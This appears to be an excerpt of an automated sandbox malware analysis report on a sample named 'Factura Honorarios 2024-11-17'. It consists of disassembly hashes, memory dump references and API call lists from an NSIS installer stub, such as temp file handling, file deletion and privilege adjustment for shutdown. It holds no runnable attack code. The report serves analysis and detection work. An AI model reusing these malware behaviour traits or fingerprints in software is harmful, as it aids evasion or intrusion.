                                                                                                                                  • Instruction ID: e07f69eb9864daab4bc7e152dae6a04e1e42d7d8ab62cf44b6f8a855657936cc
                                                                                                                                  • Opcode Fuzzy Hash: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
                                                                                                                                  • Instruction Fuzzy Hash: 60E0EC36A00108DFDF05CF59E844AEDB7B2EB98326F11C066EA198B214D7358A65DB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2eed623602348f7b83eaea3914946316de57ddc317cb2d07d397b57bad8cf63e
                                                                                                                                  • Instruction ID: e8071344c1759f604ed9db9e60af2667971d76bf36252c2dac849e7754d7ad73
                                                                                                                                  • Opcode Fuzzy Hash: 2eed623602348f7b83eaea3914946316de57ddc317cb2d07d397b57bad8cf63e
                                                                                                                                  • Instruction Fuzzy Hash: 8BD05B31D2022B97CB10E7A5DC044DFF73CEED5261B904626D52537150FB712659C6E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11e91c17e9330ecad281759e5e54601e790e1b6ea555387d4bdbd92d22d5b1c4
                                                                                                                                  • Instruction ID: e0ec01bc4f54603f4d09c1944825a045ae51b3dc64ee9d5923493a94847d752a
                                                                                                                                  • Opcode Fuzzy Hash: 11e91c17e9330ecad281759e5e54601e790e1b6ea555387d4bdbd92d22d5b1c4
                                                                                                                                  • Instruction Fuzzy Hash: 7FD05B35D6022BC6CB11EBA1EC140EDB738AED5221B948617D535371B0EB71175DC6A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                  • Instruction ID: 7664a699ddf78696b84bb1121c3968f2adab32b7b61b11eb126afe8992ed5369
                                                                                                                                  • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                  • Instruction Fuzzy Hash: 64C0803310C1246A9234104E7C40DA3774DC3C53B5A210137FD3CE7200DC425C8401F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 68272f3cecb8564699d251b1925398e5b1ca7d8b699d78099bb8cbb035665843
                                                                                                                                  • Instruction ID: 78b4a45a4638a3d23f5a3fbd52776398d673a5e2ec500a65188c00dfee9b374f
                                                                                                                                  • Opcode Fuzzy Hash: 68272f3cecb8564699d251b1925398e5b1ca7d8b699d78099bb8cbb035665843
                                                                                                                                  • Instruction Fuzzy Hash: 2DD0C7363041146B4B061A999808CAEBB5ED7C97717148027F90993300CE714D2297E5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8d28c75fb51f7622cb9fbeaf7c1276c45790401e54fad4d7cd54705cd53f5d9b
                                                                                                                                  • Instruction ID: 41d4e86803b38b6882854b2515145f8184e352f80d2eb5deac951cb252a064eb
                                                                                                                                  • Opcode Fuzzy Hash: 8d28c75fb51f7622cb9fbeaf7c1276c45790401e54fad4d7cd54705cd53f5d9b
                                                                                                                                  • Instruction Fuzzy Hash: 7BD0673AB000089FCB149F99EC809DDF776FB98221B148116E915A3260C7319965DB60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ea34f53eebb474cf1ac69157d9e88c385019cbe825be76ccfd6be03b0a9531d3
                                                                                                                                  • Instruction ID: ab0f1ef95a4285b824e11601402135ddcae3174cbfdf06f89161a61ecc6b4822
                                                                                                                                  • Opcode Fuzzy Hash: ea34f53eebb474cf1ac69157d9e88c385019cbe825be76ccfd6be03b0a9531d3
                                                                                                                                  • Instruction Fuzzy Hash: EBC012300443184FD641F769EC45555373BB7C0501B408610A6091B67FDFB42E964BD6
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32 ref: 0040337C
                                                                                                                                  • GetVersion.KERNEL32 ref: 00403382
                                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                                                                                  • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                                                                                  • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                                                                                  • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                                  • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 0040359C
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                                                                                  • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                                                                                  • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 004035EE
                                                                                                                                  • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 00403602
                                                                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004036EE
                                                                                                                                  • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                                                                                  • lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                                                                                  • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                                                                                  • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 00403743
                                                                                                                                  • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                                                                                  • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403894
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                  • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                  • API String ID: 3441113951-3195845224
                                                                                                                                  • Opcode ID: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
                                                                                                                                  • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                                                                                  • Opcode Fuzzy Hash: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
                                                                                                                                  • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405249
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
                                                                                                                                  • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                                                                                  • Opcode Fuzzy Hash: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
                                                                                                                                  • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,00437800,75573420,00000000), ref: 004059BF
                                                                                                                                  • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,00437800,75573420,00000000), ref: 00405A07
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,00437800,75573420,00000000), ref: 00405A2A
                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,00437800,75573420,00000000), ref: 00405A30
                                                                                                                                  • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,00437800,75573420,00000000), ref: 00405A40
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 2035342205-1173974218
APIs
• FindFirstFileW.KERNEL32(00437800,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,00437800,?,75573420,004059B6,?,00437800,75573420), ref: 004065D2
• FindClose.KERNEL32(00000000), ref: 004065DE
Strings
Memory Dump Source
• Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: 8gB
• API String ID: 2295610775-1733800166
                                                                                                                                  • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                                  • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                                                                  • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                                                                  • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9a5daec0362a63ace60868939951efb5e1adf402cf4c8843a076997a382b64bd
                                                                                                                                  • Instruction ID: b3581a70fb0f2bb11af8eeac51217697aa1e536facafb6f84a44ff150e12fdb7
                                                                                                                                  • Opcode Fuzzy Hash: 9a5daec0362a63ace60868939951efb5e1adf402cf4c8843a076997a382b64bd
                                                                                                                                  • Instruction Fuzzy Hash: 0272AF74E01229CFEB64DF69C984BD9BBB2BB89301F5485E9D448A7351DB309E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1453fbee56195d72a77c7ea7ff6d92055ff6e6e8264afe5fd7d969b0ac3ae57d
                                                                                                                                  • Instruction ID: 814d73ff454b90e8af321f10f09ee8a387a42f9448963d26bf7da8c819e7e6c1
                                                                                                                                  • Opcode Fuzzy Hash: 1453fbee56195d72a77c7ea7ff6d92055ff6e6e8264afe5fd7d969b0ac3ae57d
                                                                                                                                  • Instruction Fuzzy Hash: B5529B74E01228CFDB64DF69C880B9DBBB2BF89301F5085EAD909A7255DB319E85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a3442f38691a47c417302391d250e6c7f2ea3c47095a149ff1f0a16d02a0f455
                                                                                                                                  • Instruction ID: 6ce3dd143dc272dae3e14358e7d3c7a9116a99755c6e8cab5b1d351b8578769e
                                                                                                                                  • Opcode Fuzzy Hash: a3442f38691a47c417302391d250e6c7f2ea3c47095a149ff1f0a16d02a0f455
                                                                                                                                  • Instruction Fuzzy Hash: D7D19E74E00218CFEB54DFA5C994B9DBBB2BF89300F1081A9D809AB355DB359E82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4a7bdfb469fcb0a9df1244804fa2c4257fc0754a937e2d69656e79bd0083d0b6
                                                                                                                                  • Instruction ID: 68350942a36f146f5217cc873bab63b67a742d326a3a71b79c61fe13e98b4c90
                                                                                                                                  • Opcode Fuzzy Hash: 4a7bdfb469fcb0a9df1244804fa2c4257fc0754a937e2d69656e79bd0083d0b6
                                                                                                                                  • Instruction Fuzzy Hash: 31D19F74E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB354DB359E82CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90c5fa301cc5f38da430f843c005af0489795c4bb048fc90dc9220716f4072df
                                                                                                                                  • Instruction ID: 1b0be40e8d2fa91ca16ae39baf258df575ab33798fc6cc063ade5ef3cfc7987e
                                                                                                                                  • Opcode Fuzzy Hash: 90c5fa301cc5f38da430f843c005af0489795c4bb048fc90dc9220716f4072df
                                                                                                                                  • Instruction Fuzzy Hash: 45D18E74E00218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB355DB359E82DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 938d3aeab2f79237c96f3cd5677da81e7f5919cf6c273861d637328d7ad24b21
                                                                                                                                  • Instruction ID: d1f7964cf3235fa7d6943beee95ccd22de94f46bf46ca79784da5d5f9c8dcdde
                                                                                                                                  • Opcode Fuzzy Hash: 938d3aeab2f79237c96f3cd5677da81e7f5919cf6c273861d637328d7ad24b21
                                                                                                                                  • Instruction Fuzzy Hash: 14D18E74E00218CFEB54DFA5C994B9DBBB2BB89300F5081A9D809AB354DB359E86DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0409039539e5f7911517ee6178cd3d666ae1e14889c080ae3bcd71c67ac12cbe
                                                                                                                                  • Instruction ID: d7e33bc090eedbf01f6decb0b6b8ea08c5ef81bab0d94c12d75902dc6bb10eae
                                                                                                                                  • Opcode Fuzzy Hash: 0409039539e5f7911517ee6178cd3d666ae1e14889c080ae3bcd71c67ac12cbe
                                                                                                                                  • Instruction Fuzzy Hash: 5FD19E74E00218CFEB54DFA5C994B9DBBF2BB89300F1081A9D809AB355DB359E82DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 674fbf042d709c4d55c9d582d7efde037b2df4db6dad324659f34e4b4136cf6f
                                                                                                                                  • Instruction ID: 7ab1f0710983d055258fecb3becd515533f1cc727962cc0204abbdef1df0fc7f
                                                                                                                                  • Opcode Fuzzy Hash: 674fbf042d709c4d55c9d582d7efde037b2df4db6dad324659f34e4b4136cf6f
                                                                                                                                  • Instruction Fuzzy Hash: D1D18E74E00218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB354DB359E82DF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b78edb051c9d2d4deff99f64c36349226b7eb79cda1240362c1c323abfae3588
                                                                                                                                  • Instruction ID: 00bb67f8d5b5d9454b255dd37eb105c90d8aafd07433cd1651716e36a0f4fc59
                                                                                                                                  • Opcode Fuzzy Hash: b78edb051c9d2d4deff99f64c36349226b7eb79cda1240362c1c323abfae3588
                                                                                                                                  • Instruction Fuzzy Hash: F2D19E74E00218CFEB54DFA5C994B9DBBB2BF89300F5081A9D809AB354DB359E81DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4820a5766794770b0c049b312b6bbec86732cbe122d060eb527c14323720c934
                                                                                                                                  • Instruction ID: b87128ed438aaf43c3bc8b71c47c1bea484a72788d1fc008bb334be8eaec82f9
                                                                                                                                  • Opcode Fuzzy Hash: 4820a5766794770b0c049b312b6bbec86732cbe122d060eb527c14323720c934
                                                                                                                                  • Instruction Fuzzy Hash: 6ED18D74E00318CFEB54DFA5C994B9DBBB2BB89300F5081A9D809AB354DB359E82DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
